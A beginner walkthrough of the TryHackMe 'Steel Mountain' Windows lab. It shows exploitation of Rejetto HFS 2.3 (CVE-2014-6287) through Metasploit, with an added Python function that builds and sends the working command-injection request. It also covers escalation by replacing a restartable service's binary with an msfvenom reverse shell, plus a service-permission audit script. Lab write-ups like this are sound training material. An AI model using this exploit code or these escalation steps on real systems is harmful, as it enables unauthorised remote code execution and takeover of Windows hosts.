TryHackMe — Steel Mountain | CTF | Beginner Friendly Walkthrough

Nithin R
Aug 6, 2021


Hello, this is Nithin here. I’m a security researcher / enthusiast and I go by the handle @thebinarybot at most places online.

Steel Mountain is a Windows-themed room on TryHackMe based on the TV series Mr. Robot. It’s a fairly easy CTF, and here’s a write-up of how I solved it.

1. Deploy the Machine

Q1. Who is the employee of the month?

First, let’s do a basic Nmap scan with service detection (-sV), since the version banners are needed later.

There are quite a few open ports. Visiting port 80 shows a page featuring the employee of the month.

The name isn’t shown on the page itself, so I opened the image in a new tab, and the employee’s name was right there in the image URL.

Ans : Bill Harper

2. Initial Access

Q1. Scan the machine with nmap. What is the other port running a web server on?

Having completed the scan previously, I already knew that port 8080 is also serving HTTP.

Ans : 8080

Q2. Take a look at the other web server. What file server is running?

Browsing to IP:8080 and hovering over the HttpFileServer link shows that it points to rejetto.com.

Ans : Rejetto Http File Server

Q3. What is the CVE number to exploit this file server?

The Nmap service banner identifies the server as HttpFileServer httpd 2.3. Searching Exploit-DB for that version turns up the remote command execution exploit and its CVE.

Ans : 2014-6287

Q4. Use Metasploit to get an initial shell. What is the user flag?

Launching Metasploit and searching for the CVE (search cve:2014-6287) finds the module exploit/windows/http/rejetto_hfs_exec.

Setting the necessary options (RHOSTS and RPORT 8080) and running the exploit.

On the first run, the exploit completed but no session was created.

The module serves its payload from a small web server bound to SRVHOST, and the target must also be able to reach LHOST for the reverse connection. Once I set LHOST to the same address as SRVHOST (the address the target can reach, tun0 on TryHackMe), it worked and gave me a meterpreter shell.
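What the module is actually exploiting, and why the version banner from Nmap matters, as an added Python example (this is not code from the original write-up or from the Metasploit module; the host, port and command line are placeholders for a lab target):

```python
"""Added example (not from the original write-up): the request that
CVE-2014-6287 turns into command execution on Rejetto HFS 2.3, plus a
version check against the Nmap banner. Host/port/command are placeholders."""
import re
from urllib.parse import quote
from urllib.request import Request, urlopen


def hfs_banner_vulnerable(banner: str) -> bool:
    """True when a banner such as 'HttpFileServer httpd 2.3' names a release
    in the affected range: 2.3 through 2.3b (the fix shipped in 2.3c)."""
    m = re.search(r"\b2\.3([a-z]?)\b", banner)
    return bool(m) and m.group(1) < "c"


def hfs_exec_request_path(command_line: str) -> str:
    """Build the GET path that triggers the bug. HFS strips scripting-macro
    markers from the 'search' value with a regex that stops at the %00, so
    the {.exec|...} macro placed after it survives and is evaluated when the
    page template is rendered, running command_line on the server."""
    macro = "{.exec|" + command_line + ".}"
    return "/?search=%00" + quote(macro, safe="")


def hfs_exec(host: str, port: int, command_line: str, timeout: float = 5.0) -> int:
    """Send the request to a lab target and return the HTTP status. The body
    is the normal HFS page, not the command's output, so confirm execution
    out of band (for example, a listener receiving a callback)."""
    url = f"http://{host}:{port}{hfs_exec_request_path(command_line)}"
    req = Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    # Constructed banner, shaped like the Nmap -sV output for port 8080.
    print(hfs_banner_vulnerable("HttpFileServer httpd 2.3"))
    print(hfs_exec_request_path("calc"))
```

The Metasploit module sends a request of this shape with a command line that downloads and runs its stage from the module's own web server (SRVHOST:SRVPORT) and then connects back to LHOST, which is why both addresses must be reachable from the target.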

Checking bill’s home directory,

then bill’s Desktop, where the user flag sits.

Ans : b04763b6fcf51fcd7c13abc7db4fd365

3. Privilege Escalation

Uploading the PowerUp.ps1 script with meterpreter’s upload command and loading the powershell extension (load powershell),

Find the PowerUp.ps1 script (part of PowerSploit) here

Running PowerUp.ps1 (Invoke-AllChecks),

Q1. Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

Ans : AdvancedSystemCareService9

Q2. What is the root flag?

Since CanRestart is True and the application’s directory is writable, the plan is to replace the legitimate service binary with a malicious one and restart the service, so the payload runs with the service’s privileges.

Using msfvenom to create a reverse-shell executable,

Then, I uploaded my executable in place of the legitimate service binary.

Now, starting a multi/handler listener as a background job (exploit -j).

Now, restart the service (sc stop AdvancedSystemCareService9, then sc start AdvancedSystemCareService9), background the current session, connect to the elevated session caught by the handler, and read the root flag.
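To see what the two PowerUp findings above actually check, here is an added Python example that reproduces them offline over constructed service data (this is not code from the original write-up or from PowerUp itself). The IObit path, the service DACLs and the caller’s group SIDs are assumptions made for illustration:

```python
"""Added example (not from the original write-up): reproduce the two PowerUp
findings behind this escalation -- a service with an unquoted ImagePath whose
binary directory is writable, and CanRestart, which PowerUp derives from the
service DACL (`sc sdshow <name>`) rather than from the path. All paths,
DACLs and SIDs below are constructed samples."""
import ntpath  # Windows path rules regardless of the host running this
import os
import re
from typing import Callable, Iterable, List, Optional

# Typical default service DACL: only SYSTEM (SY) and Administrators (BA) hold
# RP (SERVICE_START) and WP (SERVICE_STOP).
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
# Constructed weak DACL: Authenticated Users (AU) may also start and stop.
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWRPWPLOCRRC;;;AU)")

# (Name, PathName, DACL), shaped like `wmic service get Name,PathName` joined
# with `sc sdshow`. The IObit path is an assumption, not copied from the room.
SAMPLE_SERVICES = [
    ("AdvancedSystemCareService9",
     r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe", WEAK_SDDL),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", DEFAULT_SDDL),
    ("QuotedSvc", r'"C:\Program Files\Vendor Tool\svc.exe" -service', DEFAULT_SDDL),
]
# SDDL aliases a standard user's token carries (assumed for the caller).
LOW_PRIV_SIDS = {"AU", "BU", "WD", "IU"}


def unquoted_exe(path_name: str) -> Optional[str]:
    """Return the executable part of an unquoted ImagePath that contains spaces,
    or None when the path is quoted or space-free (no ambiguity for CreateProcess)."""
    p = path_name.strip()
    if not p or p.startswith('"'):
        return None
    m = re.match(r"(.+?\.exe)", p, re.IGNORECASE)  # arguments follow the binary
    exe = m.group(1) if m else p
    return exe if " " in exe else None


def hijack_candidates(exe: str) -> List[str]:
    """Paths CreateProcess tries before the real binary: the command line up to
    each space, with .exe appended because the fragment has no extension."""
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def can_restart(sddl: str, principal_sids: Iterable[str]) -> bool:
    """PowerUp-style CanRestart: the caller is granted both SERVICE_START (RP)
    and SERVICE_STOP (WP), or GENERIC_ALL (GA), by an allow ACE and by no deny ACE.
    ACE layout is (type;flags;rights;object_guid;inherit_guid;sid)."""
    ace_re = re.compile(r"\((A|D);[^;]*;([^;]*);[^;]*;[^;]*;([^)]+)\)")
    allowed, denied = set(), set()
    for kind, rights, sid in ace_re.findall(sddl):
        if sid not in principal_sids:
            continue
        flags = set(re.findall(r"..", rights))
        if "GA" in flags:
            flags |= {"RP", "WP"}
        (allowed if kind == "A" else denied).update(flags & {"RP", "WP"})
    return {"RP", "WP"} <= allowed and not ({"RP", "WP"} & denied)


def audit(services, principal_sids, is_writable: Optional[Callable[[str], bool]] = None) -> List[dict]:
    """Flag unquoted-path services and report whether the binary's own directory
    or any hijack directory is writable, and whether the caller can restart it.
    is_writable defaults to a real os.access check; tests inject a fake."""
    if is_writable is None:
        is_writable = lambda d: os.access(d, os.W_OK)
    findings = []
    for name, path_name, sddl in services:
        exe = unquoted_exe(path_name)
        if exe is None:
            continue
        findings.append({
            "service": name,
            "exe": exe,
            "binary_dir_writable": is_writable(ntpath.dirname(exe)),
            "writable_hijack_dirs": [c for c in hijack_candidates(exe)
                                     if is_writable(ntpath.dirname(c))],
            "can_restart": can_restart(sddl, principal_sids),
        })
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SERVICES, LOW_PRIV_SIDS):
        print(finding)
```

The distinction the report draws is the one that matters on this box: the classic unquoted-path attack needs write access to one of the hijack directories (here C:\ or the IObit folder), whereas the write-up simply overwrites the service binary because its own directory is writable. Either way, CanRestart is what lets a low-privileged user trigger execution without waiting for a reboot.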
